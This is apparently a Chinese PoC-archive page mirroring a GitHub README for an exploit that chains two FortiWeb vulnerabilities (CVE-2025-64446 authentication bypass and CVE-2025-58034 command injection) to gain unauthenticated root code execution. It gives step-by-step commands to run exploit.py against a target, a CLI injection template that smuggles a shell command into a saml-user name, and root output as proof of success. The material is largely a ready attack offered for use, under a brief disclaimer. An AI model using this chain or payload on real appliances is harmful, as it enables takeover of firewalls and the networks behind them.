关联漏洞
标题:Fortinet FortiWeb 安全漏洞 (CVE-2025-64446)描述:Fortinet FortiWeb是美国飞塔(Fortinet)公司的一款Web应用层防火墙,它能够阻断如跨站点脚本、SQL注入、Cookie中毒、schema中毒等攻击的威胁,保证Web应用程序的安全性并保护敏感的数据库内容。 Fortinet FortiWeb 8.0.0版本至8.0.1版本、7.6.0版本至7.6.4版本、7.4.0版本至7.4.9版本、7.2.0版本至7.2.11版本和7.0.0版本至7.0.11版本存在安全漏洞,该漏洞源于相对路径遍历,可能导致执行管理命令。
描述
FortiWeb Remote Code Execution (RCE) Exploit via CVE-2025-64446 + CVE-2025-58034 Chain
介绍
# FortiWeb Remote Code Execution (RCE) Exploit via CVE-2025-64446 + CVE-2025-58034 Chain
## Description
This script chains two critical vulnerabilities in Fortinet FortiWeb to achieve **unauthenticated remote code execution** with root privileges:
1. **CVE-2025-64446** – Authentication Bypass via Relative Path Traversal
Allows an unauthenticated attacker to bypass authentication and create a new administrative account.
2. **CVE-2025-58034** – Authenticated OS Command Injection
An authenticated attacker (using the account created in step 1) can execute arbitrary OS commands as root via crafted HTTP requests.
By combining these two vulnerabilities, an attacker can go from zero access to full system compromise without any prior credentials.
**Final Impact:** Unauthenticated Remote Code Execution (root shell equivalent)
## Vulnerability Details
### CVE-2025-64446 – Authentication Bypass (Relative Path Traversal)
* **Type:** Relative Path Traversal leading to Authentication Bypass
* **Severity:** Critical (CVSS 3.1 Base Score: 9.8)
* **CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
* **Affected Versions:**
* FortiWeb 8.0.0 – 8.0.1
* FortiWeb 7.6.0 – 7.6.4
* FortiWeb 7.4.0 – 7.4.9
* FortiWeb 7.2.0 – 7.2.11
* FortiWeb 7.0.0 – 7.0.11
### CVE-2025-58034 – Authenticated OS Command Injection
* **CVE:** CVE-2025-58034
* **Type:** Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) – [CWE-78]
* **Severity:** Critical
* **Description:**
An authenticated attacker can execute arbitrary operating system commands on the underlying system via specially crafted HTTP requests or CLI commands.
* **Affected Versions (expanded by this CVE):**
* FortiWeb 8.0.0 – 8.0.1
* FortiWeb 7.6.0 – 7.6.5 *(note: includes 7.6.5)*
* FortiWeb 7.4.0 – 7.4.10 *(note: includes 7.4.10)*
* FortiWeb 7.2.0 – 7.2.11
* FortiWeb 7.0.0 – 7.0.11
**Combined Attack Chain:**
1. Use CVE-2025-64446 → Create admin account (unauthenticated)
2. Log in with newly created admin account
3. Use CVE-2025-58034 → Execute arbitrary OS commands as root
## Usage
1. **Clone the repository:**
```bash
git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
cd CVE-2025-64446_CVE-2025-58034
```
2. **Install dependencies:**
```bash
pip install -r requirements.txt
```
3. **Run the full exploit (creates admin + executes command):**
```bash
python exploit.py <target_ip> [-u <username>] [-p <password>]
```
* `<target_ip>`: The IP address or hostname of the vulnerable FortiWeb appliance. This is a *required* argument.
* `-u <username>` (optional): Specify a custom username for the created administrative account. If not provided, a UUID will be used.
* `-p <password>` (optional): Specify a custom password for the created administrative account. If not provided, the username will be used as the password.
**Example:**
```bash
python exploit.py 192.168.1.100 -u admin123 -p password456
```
This will attempt to create an administrative account with the username "admin123" and password "password456" on the target appliance at 192.168.1.100.
If no username and password are specified:
```bash
python exploit.py 192.168.1.100
```
The script will generate a random UUID for the username and use it as the password.
## Demonstration
### Step 1: Authentication Bypass & Admin Creation (CVE-2025-64446)
### Step 2: Remote Code Execution as root (CVE-2025-58034)
After successfully logging in with the newly created administrative account, an attacker can exploit the authenticated command injection vulnerability through specifically crafted requests or directly via the FortiWeb CLI.
One reliable exploitation method is to use the following CLI command (executed from the FortiWeb command-line interface after authentication):
```bash
config user saml-user
edit "`<YOUR COMMAND>`"
set entityID http://foo
set service-path /foo
set enforce-signing disable
set slo-bind post
set slo-path /foo
set sso-bind post
set sso-path /foo
end
```
## Verification
After execution:
- Check output for command results (e.g., `uid=0(root) gid=0(root)` confirms root RCE)
- Log in via SSH (if you added a key) or web interface with created credentials
## References
* CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
* CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
* Fortinet PSIRT Advisories: https://www.fortinet.com/support/psirt
* Analysis: https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis
**Disclaimer:** This tool is provided for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.
文件快照
[4.0K] /data/pocs/b9127dd4e7b55259be7ac172f4f45b65e37044f4
├── [4.6K] exploit.py
├── [4.0K] images
│ ├── [7.0K] exploit.png
│ ├── [ 70K] fortinet.png
│ ├── [ 23K] rce_demo.png
│ └── [ 18K] root_shell.png
├── [5.0K] README.md
└── [ 50] requirements.txt
2 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。